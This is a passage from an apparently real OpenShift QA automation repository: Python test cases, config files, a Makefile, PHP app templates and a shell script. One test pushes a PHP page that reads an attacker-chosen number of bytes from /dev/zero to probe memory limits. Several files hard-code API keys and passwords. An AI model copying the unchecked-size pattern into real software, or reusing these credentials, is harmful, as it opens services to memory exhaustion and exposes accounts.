%s\"%self.app_name,\n common.restart_app,\n function_parameters = [self.app_name, self.user_email, self.user_passwd],\n expect_return=0)\n\n\n self.add_step(\"Add greedy test app \",\n '''cd %s && cat <<'EOF' >php/test.php &&\n<?php\n $handle = fopen(\"/dev/zero\", \"r\");\n $contents = fread($handle, $_GET[\"size\"]);\n fclose($handle);\n print 'PASS';\n?>\nEOF\n git add php/test.php &&\n git commit -m \"Added 
test.php\" -a && git push'''%self.app_name,\n expect_return=0)\n\n\n self.add_step(\"Check the memory_limit less than 612M\",\n self.verify,\n function_parameters = [54857600],\n expect_return=0)\n\n self.add_step(\"Check the memory_limit more than 612M\",\n self.verify,\n function_parameters = [654857600, True],\n expect_return=2)\n\n self.add_step(\"Destroy app: %s\" % (self.app_name),\n common.destroy_app,\n function_parameters = [self.app_name],\n expect_return = 0)\n\n self.info(\"[US1265][rhc-limits]memory swap testing\")\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MemorySwap)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7423014640808105, "alphanum_fraction": 0.7504051923751831, "avg_line_length": 34.29411697387695, "blob_id": "c0fe714eaca5352deaeace0a32f32284f03f63b2", "content_id": "7d9d5e8b84bac1fb94fe2dbdf6dbadd3c64db7f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 617, "license_type": "no_license", "max_line_length": 80, "num_lines": 17, "path": "/automation/robot_to_testlink/RF-Template/testconfig.ini", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#Config file for run.py\r\n\r\n[Pybot Parameters] # Enter all pybot related parameters here.\r\n# Browser types can be a comma seperated values\r\nBROWSER = firefox\r\n\r\n[Testlink Parameters] # Parameters specific to TestLink API\r\n# Use Testlink API. Values are TRUE or FALSE\r\nTL_API = TRUE\r\n# Confgure if testlink reporting should be used or not. Values are TRUE or FALSE\r\nTL_REPORT = TRUE\r\n# Personal API access key for a particular testlink user\r\nTL_DEVKEY = c90bcf6fe605889dcf3e900688605c2f\r\n# The test plan ID in Testlink.\r\nTL_TPID = 58102\r\n# Default notes string for example \"Created by Robot Framework\"\r\nTL_BUILDDESC = Created by Robot Framework\r\n" }, { "alpha_fraction": 0.6005516052246094, "alphanum_fraction": 0.6049184203147888, "avg_line_length": 35.563026428222656, "blob_id": "8ef4ea1e9a819e878e88d1ff8871f671a804cf98", "content_id": "fc88a4aa219012467264ab57d570eaa483351b8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4351, "license_type": "no_license", "max_line_length": 164, "num_lines": 119, "path": "/automation/open/testmodules/RT/limits/max_apps.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport re\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = 'DEV'\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_type = \"python\"\n self.max_apps = 7\n self.app_name = 'my%s%s' % ( self.app_type, common.getRandomString() )\n self.git_repo = './' + self.app_name\n tcms_testcase_id=130893\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass MaxApps(OpenShiftTest):\n def max_apps_config(self, git_repo, work_dir, max_apps, user_email):\n configuration_steps = [\n \"cd %s\" % ( git_repo 
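            # each string in configuration_steps is later chained via " && ".join(...) and run as a single shell command, so any failing step short-circuits the rest.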
),\n \"cp -fv %s/app_template/max_gears/application wsgi/application\" % ( work_dir ),\n \"sed -i -e 's/#mongodb_max_gears#/%s/;s/#mongodb_user_email#/%s/' wsgi/application\" % ( max_apps, user_email ),\n \"git commit -a -m deployment\",\n \"git push\"\n ]\n\n ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(configuration_steps))\n print ret_output\n return ret_code\n\n def check_mongodb_operation_result(self, app_name):\n app_url = OSConf.get_app_url(app_name)\n return common.grep_web_page(\"http://%s/%s\" % ( app_url, \"set-max-gears\"), \"DB OPERATION SUCCESS\" )\n\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n 'Creating the first application',\n common.create_app,\n function_parameters = [ self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, True, self.git_repo ],\n expect_description = 'The app should be created successfully',\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'Configuring out Python application',\n self.max_apps_config,\n function_parameters = [ self.git_repo, WORK_DIR, self.max_apps, self.user_email ],\n expect_description = 'The MongoDB configuration should be successful',\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n 'MongoDB - setting \"max_gears\" property',\n self.check_mongodb_operation_result,\n function_parameters = [ self.app_name ],\n expect_description = 'MongoDB operation must be successful',\n expect_return = 0\n ))\n\n for i in range(2, self.max_apps + 1):\n self.steps_list.append(testcase.TestCaseStep(\n 'Creating application #%d' % ( i ),\n common.create_app,\n function_parameters = [ self.app_name + str(i), common.app_types[self.app_type], self.user_email, self.user_passwd, False, self.git_repo + str(i) ],\n expect_description = \"Creation of application #%d should be successful\" % ( i ),\n expect_return = 0\n ))\n\n step=testcase.TestCaseStep(\n 'Creation of application N+1',\n common.create_app,\n function_parameters = [ self.app_name + 'last', common.app_types[self.app_type], self.user_email, self.user_passwd, False, self.git_repo + 'last' ],\n expect_description = 'Creation of the last application should be NOT successful',\n expect_return = \"!0\"\n )\n step.add_clean_up(common.destroy_app, [self.app_name, self.user_email, self.user_passwd])\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"[rhc-node] [US1733] Allotment: Max Apps\", self.steps_list )\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MaxApps)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7203065156936646, "alphanum_fraction": 0.727011501789093, "avg_line_length": 23.85714340209961, "blob_id": "210690beeff53e16e52d9215ffb3a58e71c8fa45", "content_id": "cb29ad2e9766d926875b072503b48bcb83e10a84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1044, "license_type": "no_license", "max_line_length": 87, "num_lines": 42, "path": "/automation/open/Makefile", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "RHTEST_HOME := $(PWD)\nexport RHTEST_HOME\nPYTHONPATH := 
$(RHTEST_HOME)/lib/supports:$(RHTEST_HOME)/lib:$(RHTEST_HOME)/testmodules\nexport PYTHONPATH\nRHTEST_DEBUG := 1\nexport RHTEST_DEBUG\n\nall:\n\t@echo \"Run it as 'make test'\"\n\ntest: client web launcher\n\t@echo \"PASSED\"\n\nweb:\n\t./bin/rhtest -i int.openshift.redhat.com UI.web.case_138787\n\nclient: domain app sshkey\n\ndomain:\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.job_related.create_domain\n\napp:\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.cartridge.embed_mysql_to_jboss\n\nsshkey:\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.client.add_remove_mult_ssh_keys\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.client.add_sshkey\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.client.delete_ssh_key_per_keyname\n\t./bin/rhtest -R -G -i int.openshift.redhat.com RT.client.rhc_wrapper_ssh\n\n\nlauncher:\n\t#./bin/launcher.py --debug -g quickstart -A int.openshift.redhat.com\n\nsetup:\n\t@echo \"TODO\"\n\nupdate_client:\n\t./bin/update_rhc_client.py\n\ndoc:\n\tmake -f Makefile.sphinx html upload\n" }, { "alpha_fraction": 0.6496732234954834, "alphanum_fraction": 0.6549019813537598, "avg_line_length": 46.8125, "blob_id": "8d2efacbb5ac6e2a393bcf1390275ba9b07d871e", "content_id": "b9565aba3b1641c175c71c3c7c35dd9d0b7bc1eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 765, "license_type": "no_license", "max_line_length": 188, "num_lines": 16, "path": "/automation/open/testmodules/RT/cartridge/app_template/mysql/mysql.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"GEAR DNS: \" . $_ENV[\"OPENSHIFT_GEAR_DNS\"] . \"<br />\";\n$con=mysql_connect($_ENV[\"OPENSHIFT_MYSQL_DB_HOST\"].\":\".$_ENV[\"OPENSHIFT_MYSQL_DB_PORT\"], $_ENV[\"OPENSHIFT_MYSQL_DB_USERNAME\"], $_ENV[\"OPENSHIFT_MYSQL_DB_PASSWORD\"]) or die(mysql_error());\nmysql_select_db($_ENV[\"OPENSHIFT_APP_NAME\"],$con);\n\n\nmysql_query(\"DROP TABLE IF EXISTS ucctalk\",$con);\nmysql_query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\",$con);\nmysql_query(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\",$con);\n$result=mysql_query(\"SELECT * FROM ucctalk\",$con);\nwhile($row=mysql_fetch_array($result))\n{\necho $row['speaker'],\", \",$row['title'],\"<br />\";\n}\nmysql_close($con);\n?>\n" }, { "alpha_fraction": 0.6992592811584473, "alphanum_fraction": 0.7140740752220154, "avg_line_length": 23.10714340209961, "blob_id": "b5c8e80d189b62da2944efb339d784f6dd193a3a", "content_id": "cc965bd8e4b2ad0003a94533ed0c4ca0162276cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 93, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbossas_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 1, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom jbossas_without_jenkins import JBossHotDeployWithoutJenkins\n\nclass JBossHotDeployWithJenkins(JBossHotDeployWithoutJenkins):\n def __init__(self, config):\n JBossHotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2309] Hot deployment support for JBoss AS 7 - with Jenkins\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = 
OpenShiftTestSuite(conf)\n suite.add_test(JBossHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5522302389144897, "alphanum_fraction": 0.5533813238143921, "avg_line_length": 45.33333206176758, "blob_id": "bd7faf009183e90bc24c1e338caae52355df3018", "content_id": "1ea33a559449fcece1c21b8dd4035f51cf63597e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3475, "license_type": "no_license", "max_line_length": 765, "num_lines": 75, "path": "/automation/open/testmodules/RT/client/black_list.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport common\nimport rhtest\nimport random\nimport openshift\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"Check black list\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.domain_name = common.get_domain_name()\n self.blacklist = openshift.get_black_list(self.config.rest_api)\n self.app_type = common.app_types[\"jbossas\"]\n #string = \"amentra aop apiviz arquillian blacktie boxgrinder byteman cirras cloud cloudforms cygwin davcache dogtag drools ejb3 errai esb fedora freeipa gatein gfs gravel guvnor hibernate hornetq iiop infinispan ironjacamar javassist jbcaa jbcd jboss jbpm jdcom jgroups jmx jopr jrunit jsfunit kosmos liberation makara mass maven metajizer metamatrix mobicents modeshape mugshot netty openshift osgi overlord ovirt penrose picketbox picketlink portletbridge portletswap posse pressgang qumranet railo redhat resteasy rhca rhcds rhce rhcsa rhcss rhct rhcva rhel rhev rhq rhx richfaces riftsaw savara scribble seam shadowman shotoku shrinkwrap snowdrop solidice spacewalk spice steamcannon stormgrind switchyard tattletale teiid tohu torquebox weld wise xnio\"\n #self.blacklist = string.split()\n self.test_count = 3\n common.env_setup()\n\n def finalize(self):\n common.alter_domain(self.domain_name, self.user_email, self.user_passwd)\n\n\nclass BlackList(OpenShiftTest):\n\n def select(self):\n result = []\n random.seed()\n for i in range(self.test_count):\n rand = int(random.random() * len(self.blacklist))\n result.append(self.blacklist[rand])\n return result\n\n def test_method(self):\n final_list = self.select()\n for name in final_list:\n self.add_step(\"Update an existing domain name to one in black list - %s\" %(name),\n \"rhc domain update %s %s -l %s -p '%s' %s\" %( self.domain_name,\n name,\n self.user_email,\n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n expect_str=[\"is not allowed\"])\n\n self.add_step(\"Try to create app with name - %s\"%(name),\n \"rhc app create %s %s -l %s -p '%s' --no-git %s\"%(name,\n self.app_type,\n self.user_email,\n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n expect_str=[\"is not allowed\"])\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(BlackList)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5409018397331238, "alphanum_fraction": 0.5516759753227234, "avg_line_length": 39.09600067138672, "blob_id": "d2a2012a1aa2c4f518ffe6b2c98ca4f19e85150b", "content_id": 
"35c35217a4530fc3e117ffe881ef6527cf19e3a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5012, "license_type": "no_license", "max_line_length": 188, "num_lines": 125, "path": "/automation/open/testmodules/RT/client/snapshot_restore_mongodb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_name = common.getRandomString(10)\n tcms_testcase_id= 121920\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n\n tcms_testcase_id = 121920\n self.snapshot_file = \"snapshot_%s.tar.gz\" % self.app_name\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass SnapshotRestoreMongoDB(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a %s application\" % self.app_type,\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, True],\n expect_return=0\n\t\t\t\t))\n\n self.steps_list.append(testcase.TestCaseStep(\"Embed with mongodb\" ,\n common.embed,\n function_parameters=[self.app_name,'add-%s'%common.cartridge_types['mongodb'],self.user_email, self.user_passwd],\n expect_return=0\n\t\t\t\t))\n\n\n def modify_data(app_name, op, data):\n mongo_cmds= \"echo 'db.items.%s(%s)' | mongo\"%(op, data)\n if op=='find':\n mongo_cmds += ' | grep ObjectId '\n (status, output) = common.run_remote_cmd(app_name, mongo_cmds)\n\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\"Insert same data into mongoDB\",\n modify_data,\n function_parameters=[self.app_name,'insert', '{name: \"eggs\", quantity: 100, price: 1.50 }'],\n expect_return=0))\n\n '''steps.append(testcase.TestCaseStep(\"Embed with rockmongo\",\n common.embed,\n function_parameters=[self.app_name,'add-%s'%common.cartridge_types['rockmongo'],self.user_email, self.user_passwd],\n expect_return=0))'''\n self.steps_list.append(testcase.TestCaseStep(\"Make snapshot\",\n \"rhc snapshot save %s -f %s -l %s -p '%s' %s\"%(self.app_name, self.snapshot_file, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Drop same data from mongoDB\",\n modify_data,\n function_parameters=[self.app_name, 'remove', '{name: \"eggs\", quantity: 100, price: 1.50 }'],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify recent drop from mongoDB\",\n modify_data,\n function_parameters=[self.app_name, 'find', '{name: \"eggs\", quantity: 100, price: 1.50 }'],\n expect_return=1))\n\n self.steps_list.append(testcase.TestCaseStep(\"Restore from snapshot\",\n \"rhc snapshot restore %s -f %s -l %s -p '%s' %s\"%(self.app_name, self.snapshot_file, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Check if there are 100 eggs\",\n modify_data,\n 
function_parameters=[self.app_name, 'find', '{name: \"eggs\", quantity: 100, price: 1.50 }'],\n expect_return=0))\n\n case = testcase.TestCase(\"[US1209][Runtime][cartridge]take snapshot and restore without new app for embedded mongodb\",\n self.steps_list)\n\n def cleaning():\n cmd=\"rm -rf %s; rm -f %s\"%(self.app_name, self.snapshot_file)\n common.command_get_status(cmd)\n pass\n\n case.add_clean_up(cleaning)\n case.run()\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreMongoDB)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7753304243087769, "alphanum_fraction": 0.7973568439483643, "avg_line_length": 24.22222137451172, "blob_id": "1bc7ac471d1e031548bd57181cca77dfb6159b25", "content_id": "c25e7c8322617d0b097d4867239da0b843332cf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 227, "license_type": "no_license", "max_line_length": 55, "num_lines": 9, "path": "/automation/open/bin/test2.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\ncd /home/automation/bin\nexport OPENSHIFT_user_email=yujzhang\nexport OPENSHIFT_user_passwd=111111\nexport TCMS_USER=yujzhang\nexport TCMS_PASSWORD=Zhangyj_1986\n\npython launcher.py -a stg.openshift.redhat.com -i 44553\n" }, { "alpha_fraction": 0.6278128027915955, "alphanum_fraction": 0.6372637152671814, "avg_line_length": 33.71875, "blob_id": "6df1fe232cff8964254ebf188c8ee72e2b39037f", "content_id": "f2ab123e87d644aa01f052651c2f70ab982d7018", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2222, "license_type": "no_license", "max_line_length": 79, "num_lines": 64, "path": "/automation/pythonem.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import cookielib\nimport tempfile\nimport urllib2\nimport xmlrpclib\n\n\nclass CookieTransport(xmlrpclib.Transport):\n def __init__(self, uri, cookiejar, use_datetime=0):\n self.verbose = 0\n\n # python 2.4 compat\n if hasattr(xmlrpclib.Transport, \"__init__\"):\n xmlrpclib.Transport.__init__(self, use_datetime=use_datetime)\n\n self.uri = uri\n self.opener = urllib2.build_opener()\n self.opener.add_handler(urllib2.HTTPCookieProcessor(cookiejar))\n\n def request(self, host, handler, request_body, verbose=0):\n req = urllib2.Request(self.uri)\n req.add_header('User-Agent', self.user_agent)\n req.add_header('Content-Type', 'text/xml')\n\n if hasattr(self, 'accept_gzip_encoding') and self.accept_gzip_encoding:\n req.add_header('Accept-Encoding', 'gzip')\n\n req.add_data(request_body)\n\n resp = self.opener.open(req)\n\n # In Python 2, resp is a urllib.addinfourl instance, which does not\n # have the getheader method that parse_response expects.\n if not hasattr(resp, 'getheader'):\n resp.getheader = resp.headers.getheader\n\n if resp.code == 200:\n self.verbose = verbose\n return self.parse_response(resp)\n\n resp.close()\n raise xmlrpclib.ProtocolError(self.uri, resp.status,\n resp.reason, resp.msg)\n\n\nif __name__ == '__main__':\n test_url = 'https://bzweb01-qe.app.eng.rdu.redhat.com/xmlrpc.cgi'\n username = '[email protected]'\n password = 'redhat'\n login_info = {'login': username, 
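                  # Bugzilla's XML-RPC User.login expects exactly these 'login'/'password' keys; the same dict doubles as the credentials payload passed to xmlrpc.User.login below.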
'password': password}\n    update_info = {'ids': [713105], 'assigned_to': '[email protected]'}\n    tmpfile = tempfile.NamedTemporaryFile(prefix=\".bzcookie.\")\n    cookiefile = tmpfile.name\n\n    cj = cookielib.LWPCookieJar(cookiefile)\n    transport = CookieTransport(test_url, cj)\n    \n    xmlrpc = xmlrpclib.ServerProxy(test_url, transport)\n    xmlrpc.User.login(login_info)\n\n    # test User.valid_cookie(), Bug.update() without user info\n    valid_result = xmlrpc.User.valid_cookie({'login': username})\n    print 'valid result is: ', valid_result\n    update_result = xmlrpc.Bug.update(update_info)\n    print 'update result is: ', update_result\n" }, { "alpha_fraction": 0.6946778893470764, "alphanum_fraction": 0.7282913327217102, "avg_line_length": 25.5, "blob_id": "46fa015ac92d7142ce221053a7659cb78a1195dd", "content_id": "ba6b9f4d0c58f3c86aeee925dbc41abd1ebe59e04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "no_license", "max_line_length": 116, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/ruby18_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 29, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom ruby18_without_jenkins import Ruby18HotDeployWithoutJenkins\n\nclass Ruby18ScalingHotDeployWithoutJenkins(Ruby18HotDeployWithoutJenkins):\n    def __init__(self, config):\n        Ruby18HotDeployWithoutJenkins.__init__(self, config)\n        self.config.scalable = True\n        self.config.summary = \"[US2443]Hot deployment support for scalable application - without Jenkins - ruby-1.8\"\n    \nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(Ruby18ScalingHotDeployWithoutJenkins)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.5275459289550781, "alphanum_fraction": 0.539232075214386, "avg_line_length": 23.95833396911621, "blob_id": "6af7a2218a26af61faa8664538cc8375c3f84462", "content_id": "f72efcdfe48475193c18059581981cdecb9a935d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 599, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/automation/open/tutorial.rst", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "Tutorial for QA developers\n==========================\n\nThis is the example#1 -- with steps approach\n--------------------------------------------\n\n.. literalinclude:: testmodules/RT/node/login_via_rhcsh.py\n\nThis is the example#2 -- creating domain - simple approach\n----------------------------------------------------------\n\n.. literalinclude:: testmodules/RT/job_related/create_domain.py\n\nThis is the example#3 RT/Demo01.py - complex approach\n-----------------------------------------------------\n\n.. 
literalinclude:: testmodules/RT/Demo01.py\n\nIndices and tables\n==================\n \n * :ref:`genindex`\n * :ref:`modindex`\n * :ref:`search`\n" }, { "alpha_fraction": 0.6427145600318909, "alphanum_fraction": 0.6447106003761292, "avg_line_length": 44.54545593261719, "blob_id": "26f58a7a88729e43d708fa2ca91c715b658e92cd", "content_id": "1305bd1e2abd4e51854036977459ee3d609d4a88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 501, "license_type": "no_license", "max_line_length": 332, "num_lines": 11, "path": "/automation/open/testmodules/RT/cartridge/app_template/postgresql/php/show.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\nheader('Content-Type: text/plain');\n$db = pg_connect(\"dbname=\".$_ENV[\"OPENSHIFT_APP_NAME\"].\" \".\"user=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_USERNAME\"].\" \".\"password=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_PASSWORD\"].\" \".\"host=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_HOST\"].\" \".\"port=\".$_ENV[\"OPENSHIFT_POSTGRESQL_DB_PORT\"]) or die('Could not connect to the database: ' + pg_last_error());\n\n$result=pg_query(\"SELECT data FROM info;\");\n\nwhile( $row = pg_fetch_array($result) ) {\n echo $row[0];\n}\npg_close($db);\n?>\n" }, { "alpha_fraction": 0.5407407283782959, "alphanum_fraction": 0.5448148250579834, "avg_line_length": 31.14285659790039, "blob_id": "ef05a04036098f83f3e5570a8b5c36ff82684077", "content_id": "397532c24d9f13012dd548c1a2d1eaa2a30a2e9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2700, "license_type": "no_license", "max_line_length": 118, "num_lines": 84, "path": "/automation/open/testmodules/RT/client/alter_namespace.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport random\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n valid_variants = [\"jbossas\", \"jbosseap\", \"php\", \"ruby\", \"ruby-1.9\", \"python\", \"wsgi\", \"perl\", \"diy\", \"nodejs\"]\n random.seed()\n rand = int(random.random() * len(valid_variants))\n self.app_type = common.app_types[valid_variants[rand]]\n\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.domain_name = common.get_domain_name(self.user_email, self.user_passwd)\n self.new_domain_name = common.getRandomString(10)\n self.app_name = \"testapp%s\"%(common.getRandomString(4))\n common.env_setup()\n\n def finalize(self):\n common.alter_domain(self.domain_name, self.user_email, self.user_passwd)\n\n\nclass AlterNamespace(OpenShiftTest):\n def test_method(self):\n\n self.info(\"Alter namespace test.\")\n\n self.add_step(\"Create app\",\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False],\n expect_return=0)\n\n self.add_step(\"Change domain namespace to new one\",\n common.alter_domain,\n function_parameters=[self.new_domain_name, self.user_email, self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Get app url\",\n OSConf.get_app_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"Get app git repo url\",\n OSConf.get_git_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"Check new app url is available\",\n common.grep_web_page,\n function_parameters = [\"__OUTPUT__[3]\", \"Welcome to 
OpenShift\"],\n expect_return=0)\n\n self.add_step(\"Check new app git repo is available\",\n \"git clone __OUTPUT__[4]\",\n expect_return=0)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AlterNamespace)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5050569772720337, "alphanum_fraction": 0.5109460949897766, "avg_line_length": 36.54807662963867, "blob_id": "1cb3f6d1374ae3e856cda75f69d089454d42b1b1", "content_id": "775655918a6a3d6b5abefb7ecbd469b46f01047a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7811, "license_type": "no_license", "max_line_length": 108, "num_lines": 208, "path": "/automation/open/testmodules/RT/cartridge/PostStartScript.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: PostStartScript.py\n# Date: 2012/07/26 11:03\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.info(\"[US2008][RT] Check running post-start script\")\n self.timeout = 95\n\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n\n try:\n self.cart_variant = self.config.tcms_arguments['cartridge']\n except:\n self.cart_variant = 'mysql'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.info(\"DB VARIANT: %s\"%self.cart_variant)\n\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.custom_app_commands= \"#!/bin/sh\\n\\nid; echo TESTING_STRING_%s; \"%(\n 